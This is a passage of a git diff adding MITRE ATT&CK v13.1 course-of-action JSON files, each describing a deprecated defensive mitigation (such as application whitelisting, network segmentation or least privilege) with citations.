+ }
+ ],
+ "modified": "2019-07-24T19:36:24.202Z",
+ "name": "Hidden Users Mitigation",
+ "description": "If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the /Library/Preferences/com.apple.loginwindow Hide500Users value will force all users to be visible.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--13cad982-35e3-4340-9095-7124b653df4b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--13cad982-35e3-4340-9095-7124b653df4b.json
new file mode 100644
index 0000000000000000000000000000000000000000..d0f6b69276331899644e6a1891cbf77f7f2f117b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--13cad982-35e3-4340-9095-7124b653df4b.json
@@ -0,0 +1,32 @@
+{
+ "type": "bundle",
+ "id": "bundle--b89bfe70-b9e1-47e9-ba39-01682629f3da",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--13cad982-35e3-4340-9095-7124b653df4b",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1213",
+ "external_id": "T1213"
+ }
+ ],
+ "modified": "2019-07-24T19:06:19.932Z",
+ "name": "Data from Information Repositories Mitigation",
+ "description": "To mitigate adversary access to information repositories for collection:\n\n* Develop and publish policies that define acceptable information to be stored\n* Appropriate implementation of access control mechanisms that include both authentication and appropriate authorization\n* Enforce the principle of least-privilege\n* Periodic privilege review of accounts\n* Mitigate access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to access repositories",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62.json
new file mode 100644
index 0000000000000000000000000000000000000000..b347dfa0ef00fef97800b294d7938b4a900f3c08
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62.json
@@ -0,0 +1,47 @@
+{
+ "type": "bundle",
+ "id": "bundle--5d965f31-7f50-4a80-b385-42e8ed3d9573",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1210",
+ "external_id": "T1210"
+ },
+ {
+ "source_name": "Ars Technica Pwn2Own 2017 VM Escape",
+ "description": "Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.",
+ "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/"
+ },
+ {
+ "source_name": "TechNet Moving Beyond EMET",
+ "description": "Nunez, N. (2017, August 9). Moving Beyond EMET II \u2013 Windows Defender Exploit Guard. Retrieved March 12, 2018.",
+ "url": "https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/"
+ },
+ {
+ "source_name": "Wikipedia Control Flow Integrity",
+ "description": "Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.",
+ "url": "https://en.wikipedia.org/wiki/Control-flow_integrity"
+ }
+ ],
+ "modified": "2019-07-24T19:26:53.547Z",
+ "name": "Exploitation of Remote Services Mitigation",
+ "description": "Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods. Minimize available services to only those that are necessary. Regularly scan the internal network for available services to identify new and potentially vulnerable services. Minimize permissions and access for service accounts to limit impact of exploitation.\n\nUpdate software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nSecurity applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--159b4ee4-8fa1-44a5-b095-2973f3c7e25e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--159b4ee4-8fa1-44a5-b095-2973f3c7e25e.json
new file mode 100644
index 0000000000000000000000000000000000000000..5a291a28f5cd9f2714744bc8d7ac4934d3b3ae96
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--159b4ee4-8fa1-44a5-b095-2973f3c7e25e.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--5b84ba8d-fdd0-49ec-84e6-9265d153ac54",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--159b4ee4-8fa1-44a5-b095-2973f3c7e25e",
+ "type": "course-of-action",
+ "created": "2019-02-15T13:04:25.150Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "T1482",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1482"
+ },
+ {
+ "source_name": "Harmj0y Domain Trusts",
+ "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/",
+ "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019."
+ }
+ ],
+ "modified": "2020-09-17T18:26:17.815Z",
+ "name": "Domain Trust Discovery Mitigation",
+ "description": "Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930.json
new file mode 100644
index 0000000000000000000000000000000000000000..c9af26b0f6c82573440e42fe4563c6d31f938258
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930.json
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--ea9637ca-4ccf-4129-84e4-1582388bbd99", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1072", + "external_id": "T1072" + } + ], + "modified": "2019-07-25T12:27:40.782Z", + "name": "Third-party Software Mitigation", + "description": "Evaluate the security of third-party software that could be used in the enterprise environment. Ensure that access to management systems for third-party systems is limited, monitored, and secure. Have a strict approval policy for use of third-party systems.\n\nGrant access to Third-party systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multi-factor authentication. Verify that account credentials that may be used to access third-party systems are unique and not used throughout the enterprise network. Ensure that any accounts used by third-party providers to access these systems are traceable to the third-party and are not used throughout the network or used by other third-party providers in the same environment. Ensure third-party systems are regularly patched by users or the provider to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). 
\n\nEnsure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required.\n\nWhere the third-party system is used for deployment services, ensure that it can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the third-party system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16a8ac85-a06f-460f-ad22-910167bd7332.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16a8ac85-a06f-460f-ad22-910167bd7332.json new file mode 100644 index 0000000000000000000000000000000000000000..1834e0a05c349ed3c09cc34328051fa6359e52cb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16a8ac85-a06f-460f-ad22-910167bd7332.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--45f576fe-b754-4e7f-8716-eb3d6ac25347", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--16a8ac85-a06f-460f-ad22-910167bd7332", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1009", + "url": "https://attack.mitre.org/mitigations/T1009", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:18.699Z", + "name": "Binary Padding Mitigation", + "description": "Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d.json new file mode 100644 index 0000000000000000000000000000000000000000..7ca9f4ab49dc15307ad1b2e05d19428f6dd437da --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--9d653a45-edfb-4f85-b697-2ec376decbd2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1123", + "url": "https://attack.mitre.org/mitigations/T1123", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.317Z", + "name": "Audio Capture Mitigation", + "description": "Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.\n\nIdentify and block potentially malicious software that may be used to record audio by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16f144e4-c780-4ed2-98b4-55d14e2dfa44.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16f144e4-c780-4ed2-98b4-55d14e2dfa44.json new file mode 100644 index 0000000000000000000000000000000000000000..ac7cbc6091647f56d2af065011c269d8c475f5c2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16f144e4-c780-4ed2-98b4-55d14e2dfa44.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--1308f84b-35b8-4e16-b729-cba1e9032ed3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--16f144e4-c780-4ed2-98b4-55d14e2dfa44", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/mitigations/T1033", + "source_name": "mitre-attack", + "external_id": "T1033" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:21.484Z", + "name": "System Owner/User Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f.json new file mode 100644 index 0000000000000000000000000000000000000000..8685df58f884821f0b4f0c3d4665fdbde7c5e0c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--caefcc43-fec8-4c8e-ae9a-909b1e2bfdea", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1120", + "url": "https://attack.mitre.org/mitigations/T1120", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.899Z", + "name": "Peripheral Device Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf.json new file mode 100644 index 0000000000000000000000000000000000000000..4ba7e06be40c6792eaf58680c690c9dc2aaf8f0b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--e99e78ed-842f-4876-bb62-88c0a7c4a4b6", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1115", + "url": "https://attack.mitre.org/mitigations/T1115", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:19.205Z", + "name": "Clipboard Data Mitigation", + "description": "Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158.json new file mode 100644 index 0000000000000000000000000000000000000000..9b967b0971e14df7ef68b99cafc0c703a0a72274 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158.json 
@@ -0,0 +1,32 @@
+{
+ "type": "bundle",
+ "id": "bundle--c3d21c8d-0545-47bb-bd86-dc57b578890b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1144",
+ "external_id": "T1144"
+ }
+ ],
+ "modified": "2019-07-24T19:32:43.572Z",
+ "name": "Gatekeeper Bypass Mitigation",
+ "description": "Other tools should be used to supplement Gatekeeper's functionality. Additionally, system settings can prevent applications from running that haven't been downloaded through the Apple Store which can help mitigate some of these issues.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824.json
new file mode 100644
index 0000000000000000000000000000000000000000..d0d461dd6d4815ab87d477947418175c7ff490d8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--2a2c56c4-9b08-4802-8c94-8f34f3fe36ee",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1029",
+ "external_id": "T1029"
+ },
+ {
+ "source_name": "University of Birmingham C2",
+ "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+ "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+ }
+ ],
+ "modified": "2019-07-25T11:39:28.002Z",
+ "name": "Scheduled Transfer Mitigation",
+ "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b.json
new file mode 100644
index 0000000000000000000000000000000000000000..ce7729eccea431d5e44d72935900a330e28675fe
--- /dev/null
